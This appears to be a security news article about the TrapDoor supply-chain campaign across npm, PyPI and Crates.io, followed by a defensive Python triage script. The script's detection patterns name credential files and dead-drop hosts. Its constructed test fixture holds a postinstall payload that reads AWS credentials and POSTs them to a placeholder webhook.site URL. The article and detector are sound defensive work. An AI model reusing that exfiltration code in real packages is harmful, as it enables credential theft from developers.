
TrapDoor Supply Chain Attack Plants Poisoned Code Across Npm, PyPI, and Crates.io

Attackers published 384 versions of 34 malicious packages across three package registries; the payload ran automatically at install or import time and stole cloud keys, SSH credentials, and blockchain wallet data.

CSBadmin
2 Min Read

Attack Overview and Infection Mechanism

Security researchers have uncovered a widespread supply chain attack, dubbed TrapDoor, involving 34 malicious packages spread across npm, PyPI, and Crates.io. The campaign, first disclosed by Socket.dev on May 24, 2026, published 384 versions of those packages in total and targeted developers working in cryptocurrency, decentralized finance, Solana, AI, and security research. The malicious code ran automatically when a package was installed or imported, with no further interaction from the victim.

Targeted Data and Cross Platform Reach

The malware was built to harvest a wide range of sensitive credentials, including AWS keys, GitHub tokens, OpenAI API keys, SSH private keys, blockchain wallet files, browser login databases, and environment variables containing passwords. SlowMist’s MistEye system analysed three representative samples: git-config-sync (PyPI), token-usage-tracker (npm), and sui-framework-helpers (Crates.io). The npm variant additionally attempted to crack weak Ethereum keystore passwords and could execute remote commands on infected machines.

Evasion and Infrastructure Tactics

To avoid detection, the threat actors routed stolen data through trusted services, namely GitHub Pages, GitHub Gist, and webhook.site, rather than attacker-registered domains. Because enterprise egress controls routinely permit traffic to these services, the exfiltrated credentials blended into normal network activity; a domain blocklist alone will not catch this, so detection has to consider which processes on build and developer hosts are posting to those services and what they send. Each ecosystem was abused through its own execution hook: the PyPI packages ran on import, the Crates.io packages executed during compilation, and the npm packages launched silently after installation.
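The two traits described above, an execution hook that fires without user interaction and exfiltration to a host a firewall already trusts, are what a pre-install triage should look for. The script below is an added example written for this article; it is not tooling from Socket.dev, SlowMist, or the campaign itself. It walks an extracted package tree, flags npm lifecycle scripts, a Cargo build.rs, a setup.py, and import-time network calls in Python, then searches the files for the dead-drop hosts named in the article and for reads of the credential files the payload targeted. The package contents, the webhook.site URL, and the host and secret patterns are constructed for the demonstration and are assumptions, not indicators taken from real samples.

```python
"""Static triage of an extracted package tree for TrapDoor-style behaviour.

Added example for this article, not code from the campaign or the researchers.
All fixtures below are constructed; the host list and regexes are assumptions
chosen to match the behaviour the article describes.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Services that look benign to perimeter filtering but served as dead drops.
SUSPECT_HOSTS = ("webhook.site", "gist.github.com",
                 "gist.githubusercontent.com", "github.io")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Network primitives that have no business running from an install/import hook.
NETWORK_RE = re.compile(
    r"urlopen\(|requests\.(?:get|post)\(|socket\.socket\(|http\.client"
    r"|fetch\(|XMLHttpRequest|reqwest::|ureq::")
# Credential material the article says the payload harvested.
SECRET_RE = re.compile(
    r"(\.aws/credentials|\.ssh/id_|AWS_SECRET_ACCESS_KEY|OPENAI_API_KEY"
    r"|GITHUB_TOKEN|keystore|Login Data|\.env\b)")
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")
TEXT_SUFFIXES = {".js", ".mjs", ".cjs", ".py", ".rs", ".json", ".toml", ".sh"}


def find_exec_hooks(root: Path) -> List[str]:
    """Return the ways this package can run code without the user calling it."""
    hooks: List[str] = []
    pkg = root / "package.json"
    if pkg.is_file():
        scripts = json.loads(pkg.read_text()).get("scripts", {})
        hooks += [f"npm lifecycle script '{h}': {scripts[h]}"
                  for h in NPM_HOOKS if h in scripts]
    if (root / "build.rs").is_file():
        hooks.append("cargo build.rs: runs on the build host at compile time")
    if (root / "setup.py").is_file():
        hooks.append("setup.py: arbitrary code at pip install time")
    for init in root.rglob("__init__.py"):
        if NETWORK_RE.search(init.read_text(errors="ignore")):
            hooks.append(f"{init.relative_to(root)}: network call at import time")
    return hooks


def find_indicators(root: Path) -> Dict[str, List[str]]:
    """Collect dead-drop hosts and credential-file references across the tree."""
    hosts, secrets = set(), set()
    for f in root.rglob("*"):
        if not f.is_file() or f.suffix not in TEXT_SUFFIXES:
            continue
        text = f.read_text(errors="ignore")
        for host in URL_RE.findall(text):
            if any(host == s or host.endswith("." + s) for s in SUSPECT_HOSTS):
                hosts.add(host)
        secrets.update(SECRET_RE.findall(text))
    return {"exfil_hosts": sorted(hosts), "secret_reads": sorted(secrets)}


def triage(root: Path) -> Dict[str, object]:
    """An execution hook combined with secret access or a dead-drop host is the
    shape the article describes; either alone is common in benign packages."""
    hooks = find_exec_hooks(root)
    ind = find_indicators(root)
    suspicious = bool(hooks) and bool(ind["exfil_hosts"] or ind["secret_reads"])
    return {"exec_hooks": hooks, **ind, "suspicious": suspicious}


def build_fixtures(base: Path) -> Dict[str, Path]:
    """Constructed packages: one mimicking the campaign's shape, one clean."""
    bad = base / "example-bad-pkg"
    (bad / "src").mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "example-bad-pkg", "version": "1.0.3",
        "scripts": {"postinstall": "node src/setup.js"}}))
    (bad / "src" / "setup.js").write_text(
        'const fs = require("fs");\nconst os = require("os");\n'
        'const creds = fs.readFileSync(os.homedir() + "/.aws/credentials", "utf8");\n'
        # Constructed placeholder UUID, not a real webhook endpoint.
        'fetch("https://webhook.site/00000000-0000-0000-0000-000000000000",\n'
        '      {method: "POST", body: creds});\n')
    good = base / "example-clean-pkg"
    good.mkdir()
    (good / "package.json").write_text(json.dumps({
        "name": "example-clean-pkg", "version": "2.1.0", "main": "index.js"}))
    (good / "index.js").write_text(
        'module.exports = (a, b) => a + b; // docs: https://example.com/docs\n')
    return {"bad": bad, "good": good}


def demo() -> Dict[str, Dict[str, object]]:
    """Run triage over both fixtures in a scratch directory."""
    with tempfile.TemporaryDirectory() as tmp:
        trees = build_fixtures(Path(tmp))
        return {name: triage(path) for name, path in trees.items()}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it on a directory produced by `npm pack`, `pip download --no-binary :all:`, or `cargo vendor` before the package is installed, since by then the hook has already fired. The verdict deliberately requires both an execution hook and an indicator: postinstall scripts and build.rs are ordinary in legitimate packages, so either signal alone would drown a review in noise. Two caveats: proc-macro crates also execute at compile time without a build.rs, and a payload that builds its URL at runtime will not match the static host regex, so this is a first-pass filter, not a substitute for sandboxed dynamic analysis.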

Source: Cyber Security News
